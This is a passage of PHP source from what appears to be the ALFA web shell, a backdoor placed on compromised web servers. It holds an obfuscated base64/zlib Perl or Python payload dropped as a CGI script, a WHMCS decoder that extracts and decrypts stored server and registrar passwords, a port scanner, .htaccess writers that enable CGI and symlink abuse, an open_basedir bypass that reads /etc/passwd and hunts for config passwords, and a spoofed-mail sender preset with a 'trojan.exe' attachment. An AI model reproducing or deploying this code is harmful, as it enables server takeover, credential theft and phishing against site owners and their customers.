FfvvfYf++3/ddv/ujYt/bHeKSJZMF8/obtQLC22KPftQQyaR3kbDR6QnN3m1jJfhdhQtlt2iJDRcAl6jYY5z0M2OkDBZHZH9k+O9smE7Z+SNjl4dUzOWRoOLYk0FHk0erKGCTSEEiwTabOzTYv1HPyYD0jKF8vcjj+xFAA3A+l224/DOB3s9Pfm827XvuFBvhz0nnWTW7tMTCiLyLc9g6Hto43Kt7dMCAtDnmQ8s2+WPGdt2BI+WBjFN6mX2BuR7+sVlB0etYX8AZRR4A30OYdxsO2FfBENyAqUCZk9i1MICuAktySLQx4QKHX2DLy6SHGmAd9hBYQNDt4E7Nt2tvQC1KMLv8+Aaqc7/qn7bF9xaqdewItsgEvKNtLfQwV+xAy/SDPwEUlijgn4FcdIY4nc6+u6zmiDikHI5nmpSE94YiO2wpXYCnKPXa+VwFJenZcI7sNukpEkcYoF4yEHbHb8VbD+W9xK3/2CKj8QzwekJV4Q8GjRVk7KcqjKA7L35QpDTRC+waBAaD3YyliTlH6NvK5pX1O+FFzTpW7PzpH4KQUPej8Dmkr8vef+3t7zMvG73cfVDvGKPLY3WL5xgw0tuTVnOP3GEdamb1VlcDXW4zkgZAb2qNlCSHToTlf8QGGNE+lKh8IXpkbtU74KtWrfS4ZOFwB0FjCTpkGVrJouVBMlCgJJR1dkOKtKCXiEkcwLSAvS9xPPOHRh8qcAq68XixU0/I4fr4bWbESusf5GeVV/hzl2biLd7NAeDBJSS/QeJT7sJdw/4GihJ34rxzu0D4rmyCJoECmt57DrHPqOpYEXeWVfQhJQo2HXTr8/7vefi5XLSnNysOCqNs5GSm0CtTeC8yxYn8cEmz5LIcA4BHV0iZcH+MDG0mwRR3EM9pZTkNJ7RDutB8YfY9uHOrTiCA/0FfzFrMEUwhpPa3LUDcIJJPgxFgLktdbOUxh28ERXnb9rPWlExBEc4irmEjlH6Cqfuz/9Ai61ddBze9WAKolh5cX3KGrOodWA8yVNfzZnvT2gqalV4l+7GqF2NQ2iM2Y/PA3KleW9Jej8jVWYlhxXX8JOWzdmSFeHSKu7no7u6hux6v/QhOlXE+Y/nU+3o9aPjKJ/a7ICgEweSO46A6wWJbkvp0yoUNvZr/sXZzJfpus97HI2bM6NimQ0oo3ZWD6/S7+USkZiBg65/9GhEHw/juYcdpur76eM3MUFnFvg5VdIAJUBQCQSQk6ARA2Fcw8+7K1Or2M4p1WDJWToPxoqm9eAa+D0SG5cc+2FHqjbNatJUKASduszhiV55d3yVbEiORCTGM6IX7lTzBjYHhiZWZ7BxrfML3JWMlxvWtsrOPteOm1vuC4PLo7PJ9Oz/dMxHDNru73CGF+8G19sMZqna1Jex9iaTN0ShIdW7aKISmUcEjDcFtOZuJyVp2kfr8C0xqD9AFaAWPJSoIH6QV1ufsCTdGMN40XFwbyhAl4TvHezJ37gZk/xxgkvz2CwgBOivO75LoF9n0LGv3lFqi5oOzWovdHehMEDR4nKPdQPiFuv6S6F6qtY4aKSWwGV+V9xjWT8wbQ3rXsnHLy/wXvfv9RRth3DfVFPjhqmLO73WuIw4J/KBqGGQ5xmBn0cx/SRGD+k5YOHuomaMUUDqgKybUCySYOI0TD5tqjGYFoKL4dKksY3maP3uzrJEphJ/CWDoqKLygCiRTqorMaMUqdPc92qLqvKBPiLcawbU0+Pen3QLo9frfX9k4tTcQ3qtprb35b14ytFQd0of/EfDcD2s9Or8g3v6chnaouLKwWUmLvbemPi0SdkxrCxPgJWU3XgxRvQ1I1MvE1VCaBN8QC7AWndRnGsMlJo+GU13GzKFLLK+JQxtpLaSEbt1lfHJLt1b1Kz/w8wblS+FRoAAA==")));\';;\r\n$py = \'#!/usr/bin/python\'."\\nimport zlib, base64\\n".\'eval(compile(zlib.decompress(base64.b64decode("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")),\\\'<string>\\\',\\\'exec\\\'))\';\r\nif($_POST[\'alfa1\']==\'perl\'){$code = $perl;}else{$code = $py;}\r\nif(__write_file($name,$code)){\r\n@chmod($name,0755);\r\necho \'<iframe src="\'.__ALFA_DATA_FOLDER__.\'/cgialfa/\'.$name.\'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>\';\r\n}\r\n}\r\necho $div;\r\nalfafooter();\r\n}\r\nfunction alfaWhmcs(){\r\nalfahead();\r\necho \'<div class=header>\';\r\nfunction decrypt($string,$cc_encryption_hash){\r\n$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);\r\n$hash_key = _hash($key);\r\n$hash_length = strlen ($hash_key);\r\n$string = __ZGVjb2Rlcg($string);\r\n$tmp_iv = substr ($string, 0, $hash_length);\r\n$string = substr ($string, $hash_length, strlen ($string) - $hash_length);\r\n$iv = $out = \'\';\r\n$c = 0;\r\nwhile ($c < $hash_length)\r\n{\r\n$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));\r\n++$c;\r\n}\r\n$key = $iv;\r\n$c = 0;\r\nwhile ($c < strlen ($string))\r\n{\r\nif (($c != 0 AND $c % $hash_length == 0))\r\n{\r\n$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));\r\n}\r\n$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));\r\n++$c;\r\n}\r\nreturn $out;\r\n}\r\nfunction _hash($string)\r\n{\r\nif(function_exists(\'sha1\'))\r\n{\r\n$hash = sha1 ($string);\r\n}\r\nelse\r\n{\r\n$hash = md5 ($string);\r\n}\r\n$out = \'\';\r\n$c = 0;\r\nwhile ($c < strlen ($hash))\r\n{\r\n$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));\r\n$c += 2;\r\n}\r\nreturn $out;\r\n}\r\nAlfaNum(8,9,10);\r\necho "<center><br><div class=\'txtfont_header\'>| WHMCS DeCoder |</div><p>".getConfigHtml(\'whmcs\')."</p><form onsubmit=\\"g(\'Whmcs\',null,this.form_action.value,\'decoder\',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\\">\r\n<input type=\'hidden\' name=\'form_action\' value=\'2\'>";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_host : \', \'inputName\' => \'db_host\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_username : \', \'inputName\' => \'db_username\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_password : \', \'inputName\' => \'db_password\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_name : \', \'inputName\' => \'db_name\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'cc_encryption_hash : \', \'inputName\' => \'cc_encryption_hash\', \'id\' => \'cc_encryption_hash\', \'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<p><input type=\'submit\' value=\' \' name=\'Submit\'></p></form></center>";\r\nif($_POST[\'alfa5\']!=\'\'){\r\n$db_host=($_POST[\'alfa7\']);\r\n$db_username=($_POST[\'alfa3\']);\r\n$db_password=($_POST[\'alfa4\']);\r\n$db_name=($_POST[\'alfa5\']);\r\n$cc_encryption_hash=($_POST[\'alfa6\']);\r\necho __pre();\r\n$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));\r\n$query = mysqli_query($conn,"SELECT * FROM tblservers");\r\n$num = mysqli_num_rows($query);\r\nif ($num > 0){\r\nfor($i=0; $i <=$num-1; $i++){\r\n$v = @mysqli_fetch_array($query);\r\n$ipaddress = $v[\'ipaddress\'];\r\n$username = $v[\'username\'];\r\n$type = $v[\'type\'];\r\n$active = $v[\'active\'];\r\n$hostname = $v[\'hostname\'];\r\necho("<center><table border=\'1\'>");\r\n$password = decrypt ($v[\'password\'], $cc_encryption_hash);\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Type</font></td><td>$type</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Active</font></td><td>$active</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Hostname</font></td><td>$hostname</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Ip</font></td><td>$ipaddress</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Username</font></td><td>$username</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#FFFFFF\\">Password</font></td><td>$password</td></tr></b>");\r\necho "</table><br><br></center>";\r\n}\r\n$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");\r\n$num1 = @mysqli_num_rows($query1);\r\nif ($num1 > 0){\r\nfor($i=0; $i <=$num1 -1; $i++){\r\n$v = mysqli_fetch_array($query1);\r\n$registrar = $v[\'registrar\'];\r\n$setting = $v[\'setting\'];\r\n$value = decrypt($v[\'value\'], $cc_encryption_hash);\r\nif ($value==""){\r\n$value=0;\r\n}\r\necho("<center>Domain Reseller <br><center>");\r\necho("<center><table border=\'1\'>");\r\necho("<tr><td><b><font color=\\"#67ABDF\\">Register</font></td><td>$registrar</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#67ABDF\\">Setting</font></td><td>$setting</td></tr></b>");\r\necho("<tr><td><b><font color=\\"#67ABDF\\">Value</font></td><td>$value</td></tr></b>");\r\necho "</table><br><br></center>";\r\n}\r\n}\r\n}else{__alert(\'<font color="red">tblservers is Empty...!</font>\');};\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfaportscanner(){\r\nalfahead();\r\necho \'<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>\r\n<form action="" method="post" onsubmit="g(\\\'portscanner\\\',null,null,this.start.value,this.end.value,this.host.value); return false;">\r\n<input type="hidden" name="y" value="phptools">\r\n<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>\r\n<div class="txtfont">Port start: </div> <input id="text" size="5" type="text"  name="start" value="80"/>\r\n<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />\r\n</form></center><br>\';\r\n$start = strip_tags($_POST[\'alfa2\']);\r\n$end = strip_tags($_POST[\'alfa3\']);\r\n$host = strip_tags($_POST[\'alfa4\']);\r\nif(isset($_POST[\'alfa4\']) && is_numeric($_POST[\'alfa3\']) && is_numeric($_POST[\'alfa2\'])){\r\necho __pre();\r\n$packetContent = "GET / HTTP/1.1\\r\\n\\r\\n";\r\nif(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);\r\nelse{\r\n$packetContent = str_replace(array("\\r","\\n"), "", $packetContent);\r\n$packetContent = str_replace(array("\\\\r","\\\\n"), array("\\r", "\\n"), $packetContent);\r\n}\r\nfor($i = $start; $i<=$end; $i++){\r\n$sock = @fsockopen($host, $i, $errno, $errstr, 3);\r\nif($sock){\r\nstream_set_timeout($sock, 5);\r\nfwrite($sock, $packetContent."\\r\\n\\r\\n\\x00");\r\n$counter = 0;\r\n$maxtry = 1;\r\n$bin = "";\r\ndo{\r\n$line = fgets($sock, 1024);\r\nif(trim($line)=="")$counter++;\r\n$bin .= $line;\r\n}while($counter<$maxtry);\r\nfclose($sock);\r\necho "<center><p>Port <font style=\'color:#DE3E3E\'>$i</font> is open</p>";\r\necho "<p><textarea style=\'height:140px;width:50%;\'>".$bin."</textarea></p></center>";\r\n}\r\nflush();\r\n}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfacgihtaccess($m,$d=\'\', $symname=false){\r\n$readme = "";\r\nif($symname){$readme="\\nReadmeName ".trim($symname);}\r\nif($m==\'cgi\'){\r\n$code = "#Coded By Sole Sad & Invisible\\nOptions FollowSymLinks MultiViews Indexes ExecCGI\\nAddType application/x-httpd-cgi .alfa\\nAddHandler cgi-script .alfa";\r\n}elseif($m==\'sym\'){\r\n$code = "#Coded By Sole Sad & Invisible\\nOptions Indexes FollowSymLinks\\nDirectoryIndex solevisible.phtm\\nAddType text/plain php html php4 phtml\\nAddHandler text/plain php html php4 phtml{$readme}\\nOptions all";\r\n}elseif($m==\'shtml\'){\r\n$code = "Options +Includes\\nAddType text/html .shtml\\nAddHandler server-parsed .shtml";\r\n}\r\n@__write_file($d . ".htaccess", $code);\r\n}\r\nfunction alfabasedir(){\r\nalfahead();\r\necho \'<div class=header>\r\n<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>\';\r\n$passwd = _alfa_file(\'/etc/passwd\');\r\nif(is_array($passwd)){\r\n$users = array();\r\n$makepwd = alfaMakePwd();\r\n$basedir = @ini_get(\'open_basedir\');\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){\r\n$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";\r\n$tmp_path = alfaWriteTocgiapi("basedir.alfa",$bash);\r\n$bash_users  = alfaEx("cd ".$tmp_path."/alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);\r\n$users = json_decode($bash_users, true);\r\n$x=count($users);\r\nif($x>=2){array_pop($users);--$x;}\r\n}\r\nif(!$basedir&&!$safe_mode){\r\n$x=0;\r\nforeach($passwd as $str){\r\n$pos = strpos($str,\':\');\r\n$username = substr($str,0,$pos);\r\n$dirz = str_replace("{user}", $username, $makepwd);\r\nif(($username != \'\')){\r\nif (@is_readable($dirz)){\r\narray_push($users,$username);\r\n$x++;\r\n}}}\r\n}\r\necho \'<br><br>\';\r\necho "<b><font color=\\"#00A220\\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\\n"."<br /></font></b>";\r\necho "<b><font color=\\"#FFFFFF\\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\\n"."<br /></font></b>";\r\necho "<b><font color=\\"#FF0000\\">[~] Searching for passwords in config files...\\n\\n"."<br /><br /><br /></font></b>";\r\nforeach($users as $user){\r\nif(empty($user))continue;\r\n$path = str_replace("{user}", $user, $makepwd);\r\necho "<form method=post onsubmit=\'g(\\"FilesMan\\",this.c.value,\\"\\");return false;\'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class=\'foottable\' type=text name=c value=\'$path\'><input type=submit value=\'>>\'></form><br>";\r\n}\r\n}else{echo(\'<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>\');}\r\necho \'<br><br></b>\';\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfamail(){\r\nalfahead();\r\necho \'<div class=header>\';\r\nAlfaNum(8,9,10);\r\necho \'<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\\\'mail\\\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\\\'>>\\\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">\';\r\n$table = array(\r\n\'td1\' => array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mail To : \', \'inputName\' => \'mail_to\', \'inputValue\' => \'target@fbi.gov\', \'inputSize\' => \'60\',\'placeholder\' => true),\r\n\'td2\' => array(\'color\' => \'FFFFFF\', \'tdName\' => \'From : \', \'inputName\' => \'mail_from\', \'inputValue\' => \'sec@google.com\', \'inputSize\' => \'60\', \'placeholder\' => true),\r\n\'td3\' => array(\'color\' => \'FFFFFF\', \'tdName\' => \'Subject : \', \'inputName\' => \'mail_subject\', \'inputValue\' => \'your site hacked by me\', \'inputSize\' => \'60\'),\r\n\'td4\' => array(\'color\' => \'FFFFFF\', \'tdName\' => \'Attach File : \', \'inputName\' => \'mail_attach\', \'inputValue\' => $GLOBALS[\'cwd\'].\'trojan.exe\', \'inputSize\' => \'60\'),\r\n\'td5\' => array(\'color\' => \'FFFFFF\', \'tdName\' => \'Count Mail : \', \'inputName\' => \'count_mail\', \'inputValue\' => \'1\', \'inputSize\' => \'60\')\r\n);\r\ncreate_table($table);\r\necho \'<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>\';\r\nif(isset($_POST[\'alfa4\'])&&($_POST[\'alfa4\'] == \'>>\')){\r\n$mail_to = $_POST[\'alfa1\'];\r\n$mail_from = $_POST[\'alfa2\'];\r\n$mail_subject = $_POST[\'alfa3\'];\r\n$mail_content = $_POST[\'alfa5\'];\r\n$count_mail = (int)$_POST[\'alfa6\'];\r\n$mail_attach = $_POST[\'alfa7\'];\r\nif(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){\r\nif(!empty($mail_attach)&&@is_file($mail_attach)){\r\n$file = $mail_attach;\r\n$content = __read_file($file);\r\n$content = chunk_split(__ZW5jb2Rlcg($content));\r\n$uid = md5(uniqid(time()));\r\n$filename = basename($file);\r\n$headers  = "From: ".$mail_from." <".$mail_from.">\\r\\n";\r\n$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \\r\\n";\r\n$headers .= "Reply-To: ".$mail_from."\\r\\n";\r\n$headers .= "Content-Type: multipart/mixed; boundary=\\"".$uid."\\"\\r\\n\\r\\n";\r\n$headers .= \'MIME-Version: 1.0\' . "\\r\\n";\r\n$headers .= \'X-Mailer: php\' . "\\r\\n";\r\n$mail_content  = "--".$uid."\\r\\n";\r\n$mail_content .= "Content-type:text/plain; charset=iso-8859-1\\r\\n";\r\n$mail_content .= "Content-Transfer-Encoding: 7bit\\r\\n\\r\\n";\r\n$mail_content .= $mail_content."\\r\\n\\r\\n";\r\n$mail_content .= "--".$uid."\\r\\n";\r\n$mail_content .= "Content-Type: application/octet-stream; name=\\"".$filename."\\"\\r\\n";\r\n$mail_content .= "Content-Transfer-Encoding: base64\\r\\n";\r\n$mail_content .= "Content-Disposition: attachment; filename=\\"".$filename."\\"\\r\\n\\r\\n";\r\n$mail_content .= $content."\\r\\n\\r\\n";\r\n$mail_content .= "--".$uid."--";\r\n}else{\r\n$headers  = "From: " . $mail_from. " ( ".$mail_from." ) \\r\\n";\r\n$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \\r\\n";\r\n$headers .= \'Reply-To: \'.$mail_from.\'\' . "\\r\\n";\r\n$headers .= \'Content-type: text/html; charset=utf-8\' . "\\r\\n";\r\n$headers .= \'MIME-Version: 1.0\' . "\\r\\n";\r\n$headers .= \'X-Mailer: php\' . "\\r\\n";\r\n}\r\nif(empty($count_mail)||$count_mail<1)$count_mail=1;\r\nif(!empty($mail_from)){echo __pre();\r\nfor($i=1;$i<=$count_mail;$i++){\r\nif(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");\r\n}}else{__alert("Invalid Mail From !");}\r\n}else{__alert("Invalid Mail To !");}\r\n}\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction alfaziper(){\r\nalfahead();\r\nAlfaNum(8,9,10);\r\necho \'<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>\r\n<form onSubmit="g(\\\'ziper\\\',null,null,null,this.dirzip.value,this.zipfile.value,\\\'>>\\\');return false;" method="post">\r\n<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="\'.(!empty($_POST[\'alfa3\'])?htmlspecialchars($_POST[\'alfa3\']):htmlspecialchars($GLOBALS[\'cwd\'])).\'" size="60"/>\r\n<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="\'.$GLOBALS[\'cwd\'].\'alfa.zip" size="60"/>\r\n<input type="submit" value=" " name="ziper" />\r\n</form></center></p>\';\r\nif(isset($_POST[\'alfa5\']) && ($_POST[\'alfa5\'] == \'>>\')){\r\n$dirzip = $_POST[\'alfa3\'];\r\n$zipfile = $_POST[\'alfa4\'];\r\nif($GLOBALS[\'sys\']!=\'unix\'&&_alfa_can_runCommand(true,true)){\r\nalfaEx("powershell Compress-Archive -Path \'".addslashes($dirzip)."\' -DestinationPath \'".addslashes(basename($zipfile))."\'");\r\necho __pre().\'<center><p>Done -> <b><font color="green">\'.$zipfile.\'</font></b></p></center>\';\r\n}elseif($GLOBALS[\'sys\']==\'unix\'&&_alfa_can_runCommand(true,true)){\r\nalfaEx("cd \'".addslashes(dirname($zipfile))."\';zip -r \'".addslashes(basename($zipfile))."\' \'".addslashes($dirzip)."\'");\r\necho __pre().\'<center><p>Done -> <b><font color="green">\'.$zipfile.\'</font></b></p></center>\';\r\n}elseif(class_exists(\'ZipArchive\')){\r\nif(__alfaziper($dirzip, $zipfile)){\r\necho __pre().\'<center><p><font color="green">Success...!<br>\'.$zipfile.\'</font></p></center>\';\r\n}else{echo __pre().\'<center><p><font color="red">ERROR!!!...</font></p></center>\';}\r\n}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction __alfaziper($source,$destination){\r\n\tif(!extension_loaded(\'zip\')||!file_exists($source)){\r\n\t\treturn false;\r\n\t}\r\n\t$zip=new ZipArchive();\r\n\tif(!$zip->open($destination,ZIPARCHIVE::CREATE)){\r\n\t\treturn false;\r\n\t}\r\n\t$source=str_replace(\'\\\\\',\'/\',realpath($source));\r\n\tif(is_dir($source)===true){\r\n\t\t$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);\r\n\t\tforeach($files as $file){\r\n\t\t\t$file=str_replace(\'\\\\\',\'/\',$file);\r\n\t\t\tif(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;\r\n\t\t\t$file=realpath($file);\r\n\t\t\tif(is_dir($file)===true){\r\n\t\t\t\t$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));\r\n\t\t\t}else if(is_file($file)===true){\r\n\t\t\t\t$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));\r\n\t\t\t}\r\n\t\t}\r\n\t}else if(is_file($source)===true){\r\n\t\t$zip->addFromString(basename($source),file_get_contents($source));\r\n\t}\r\n\treturn $zip->close();\r\n}\r\nfunction alfadeziper(){\r\nalfahead();\r\nAlfaNum(8,9,10);\r\necho \'<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>\r\n<form onSubmit="g(\\\'deziper\\\',null,null,null,this.dirzip.value,this.zipfile.value,\\\'>>\\\');return false;" method="post">\r\n<div class="txtfont">File: </div> <input type="text" name="dirzip" value="\'.(!empty($_POST[\'alfa3\'])?htmlspecialchars($_POST[\'alfa3\']):htmlspecialchars($GLOBALS[\'cwd\'])).\'" size="60"/>\r\n<div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="\'.$GLOBALS[\'cwd\'].\'" size="60"/>\r\n<input type="submit" value=" " name="ziper" />\r\n</form></center></p>\';\r\nif(isset($_POST[\'alfa5\']) && ($_POST[\'alfa5\'] == \'>>\')){\r\n$dirzip = $_POST[\'alfa3\'];\r\n$zipfile = $_POST[\'alfa4\'];\r\nif(@!is_dir($zipfile)){\r\n\t@mkdir($zipfile, 0777, true);\r\n}\r\n$finfo = "";\r\n$file_type = "";\r\nif(function_exists(\'finfo_open\')){\r\n$finfo = @finfo_open(FILEINFO_MIME_TYPE);\r\n$file_type = @finfo_file($finfo, $dirzip);\r\n@finfo_close($finfo);\r\n}else{\r\n\tif($GLOBALS[\'sys\']==\'unix\'&&_alfa_can_runCommand(true,true)){\r\n\t\t$file_type = alfaEx(\'file -b --mime-type \' . $dirzip);\r\n\t}\r\n}\r\nif($GLOBALS[\'sys\']!=\'unix\'&&_alfa_can_runCommand(true,true)){\r\nalfaEx("powershell expand-archive -path \'".addslashes($dirzip)."\' -destinationpath \'".addslashes(basename($zipfile))."\'");\r\necho __pre().\'<center><p>Done -> <b><font 